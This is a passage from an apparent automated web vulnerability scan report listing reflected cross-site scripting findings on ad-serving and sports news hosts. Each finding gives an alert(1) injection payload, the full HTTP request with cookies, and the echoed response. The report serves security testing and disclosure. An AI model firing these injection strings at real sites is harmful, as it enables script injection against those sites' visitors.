Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4192a--><script>alert(1)</script>fc1a324ec2a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-14192a--><script>alert(1)</script>fc1a324ec2a&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:23 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3745

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>fc1a324ec2a" -->

...[SNIP]...

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13198-126290-5934-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d70'-alert(1)-'9add617d7d3 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3">
...[SNIP]...

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13198-126290-5934-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cce6'%3balert(1)//bd0628ff781 was submitted in the mpvc parameter. This input was echoed as 1cce6';alert(1)//bd0628ff781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6'%3balert(1)//bd0628ff781 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:25 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6';alert(1)//bd0628ff781http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13198-126290-5934-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77daa'%3balert(1)//71eb06d6eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77daa';alert(1)//71eb06d6eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa'%3balert(1)//71eb06d6eab=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 5:34:24 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 420
Date: Thu, 05 May 2011 01:00:26 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa';alert(1)//71eb06d6eab=1http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/14302-119028-16279-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a09e'-alert(1)-'fb0851aaf65 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:17:54 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 631
Date: Thu, 05 May 2011 01:00:19 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:6
...[SNIP]...
52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65">
...[SNIP]...

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/14302-119028-16279-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e9d9'%3balert(1)//9b1f5b87858 was submitted in the mpvc parameter. This input was echoed as 3e9d9';alert(1)//9b1f5b87858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9'%3balert(1)//9b1f5b87858 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:34:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 630
Date: Thu, 05 May 2011 01:00:21 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9';alert(1)//9b1f5b87858http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/14302-119028-16279-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41e2'%3balert(1)//ab4d8722cb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e2';alert(1)//ab4d8722cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2'%3balert(1)//ab4d8722cb9=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:39:09 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 633
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2';alert(1)//ab4d8722cb9=1http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aol.sportingnews.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16ea"><script>alert(1)</script>3359d04778d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f16ea"><script>alert(1)</script>3359d04778d=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044482-New%7C1367647044482%3B%20s_nrgvo%3DNew%7C1367647044484%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_cc=true; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105579

<!DOCTYPE html>


<!--[if IE 7 ]> <html class="n
...[SNIP]...
<meta property="og:url" content="http://www.sportingnews.com/?f16ea"><script>alert(1)</script>3359d04778d=1" />
...[SNIP]...

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aol.sportingnews.com
Path:	/iframe-widgets/feed/accordion.php

Issue detail

The value of the body-class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f8b"><script>alert(1)</script>775d746b45d was submitted in the body-class parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=homepage20f8b"><script>alert(1)</script>775d746b45d HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10973

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="homepage20f8b"><script>alert(1)</script>775d746b45d">
...[SNIP]...

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aol.sportingnews.com
Path:	/iframe-widgets/feed/accordion.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c506"><script>alert(1)</script>03731420e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=home/7c506"><script>alert(1)</script>03731420e7cpage HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10974

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="home/7c506"><script>alert(1)</script>03731420e7cpage">
...[SNIP]...

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aol.sportingnews.com
Path:	/services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the HTML document as plain text between tags. The payload 39601<script>alert(1)</script>ba982c7c28d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15039601<script>alert(1)</script>ba982c7c28d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=283
Date: Thu, 05 May 2011 00:59:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4829

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-size:11px; color:#000; }
#fs { display:block; width:180px; height:15039601<script>alert(1)</script>ba982c7c28dpx; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15039601<script>
...[SNIP]...

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://aol.sportingnews.com
Path:	/services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e5"><script>alert(1)</script>0234b75261d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150aa9e5"><script>alert(1)</script>0234b75261d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
